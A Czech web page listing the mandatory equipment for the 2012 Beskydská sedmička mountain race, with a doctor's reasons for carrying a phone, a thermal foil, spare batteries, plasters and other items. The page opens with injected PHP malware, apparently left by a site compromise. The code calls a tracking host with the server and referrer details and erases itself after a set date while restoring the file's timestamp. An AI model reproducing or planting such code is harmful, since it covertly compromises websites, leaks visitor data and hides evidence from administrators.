check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456735874){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776897&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_banners/models.php"); } POVINNÁ VÝBAVA - ADIDAS TERREX - CONTINENTAL BESKYDSKÁ SEDMIČKA 2012
           
www.continental.cz
POVINNÁ VÝBAVA - ADIDAS TERREX - CONTINENTAL BESKYDSKÁ SEDMIČKA 2012

Protože se stále diskutuje kolem povinné výbavy, mnozí pochybují o smyslu některých součástí nebo nechávají pořízení povinné výbavy na poslední chvíli nebo to neřeší vůbec přinášíme vyjádření lékaře MUDr. Radomíra Maráčka, který je zároveň členem HORSKÉ SLUŽBY k jednotlivým bodům povinné výbavy.

Zároveň upozorňujeme, že povinná výbava BUDE V PRŮBĚHU ZÁVODU NÁHODNĚ KONTROLOVÁNA A POKUD NEDODRŽÍTE TOTO PRAVIDLO, BUDETE DISKVALIFIKOVÁNI.


1. Plně nabitý funkční telefon ve vyplém stavu kvůli úspoře baterií
V dnešní době zásadní potřeba. Pokud se Vám něco stane, můžete sejít z cesty, zabloudit, tak bude jedinou možností, jak si přivoláte pomoc. Navíc Vás dle něj bude moci Horská služba ve spolupráci s Policií ČR najít.

1a. Nepromokavý obal na telefon (nejlepší je kondom :-)
Nefunkční telefon je na nic. Pokud nemáte speciální vlhku a vodě odolný, musí být v suchu.


2. NRC alufolie (na podchlazení)

Vyčerpaný organismus má menší schopnost “vyrábět” vlastní teplo, takže při problému znamenajícího delší zastavení je nutné okamžitě použít alufolie k zábraně ztrát tepla, pokud právě “nepere slunce”. Až Vám začne být zima, je pozdě. Alufolie nezahřeje, jen zadržuje Vaše vlastní teplo. Než dorazí pomoc může to trvat dlouhé minuty. Ne všude se dostane terenní auto nebo čtyřkolka.


3. Náhradní baterie do čelovek (nepoužívejte dobíjecí ale kvalitní jednorázové – alkalické, někteří pujdete 2 noci)
Nevidět znamená bezpečně nejít, zabloudit, sejít z trasy, spadnout. Nikdy nevíte, jaké baterky zrovna máte, jakou mají skutečnou kapacitu. Ani nevíte, jak dlouho je budete potřebovat. Nefunkční čelovka je na nic.


4. Náplasti na puchýře (hooodně, moc)
Pravděpodobnost puchýřů a otlaků je vysoká a velmi individuální. Neznamená, že je nemíváte, že nemohou být. Závisí nejen na obuvi a ponožkách, ale i na počasí. Na trase budou sanitní vozy, ale tam Vám půchýře jen ošetří. Náplasti nemají. Dnes existuje velká nabídka speciálně tvarovaných na určitá místa a navíc i v plastových obalech. Náplast, aby byla použitelná, musí být v suchu. Jsou i speciální náplasti do vlhka. Na promaštěnou pokožku náplast nenalepíte. Vždy je lépe použít náplast předem než vznikne problém. Při délce závodu většina nevydrží.


5. Elastické obinadlo
Existuje pravděpodobnost přetížení úponů zejména v oblasti kolen, podvrtnutí kotníku, úraz na horních končetinách, úraz hlavy. Jeho užití je nejjednoduší a nejefektivnější.


6. Analgetikum (brufen, algifen, ibalgin, tramal, atd. – o volbě léku a množství užití se poraďte se svým lékařem!!!)
Zázračná růžová tabletka, zvláště pro ty co ji neberou nebo nebrali. Pomůže Vám sejít, dojít, vydržet. Gely jsou na nic.


7. Náhradní čelovka 1 kus na tým (zodpovídá kapitán)
Čelovka je jen přístroj a může se pokazit, poškodit pádem na zem (větev) a můžete ji i ztratit. Bez ní jste kde?


8. Finanční hotovost na jídlo a případný taxík
Cestou potkáte řadu chat, restaurací i obchodů. Nic není zadarmo. Proč všechno jídlo mít sebou, když něco můžete dokoupit cestou. Na občerstvovačkách není vše. Iontové nápoje a speciální energetické tyčky na chatách nekoupíte. Energetické nápoje většinou ano.


9. Pytlík na odpadky
Co do hor a lesa doneseš, tak si zase odnes. Děkujeme.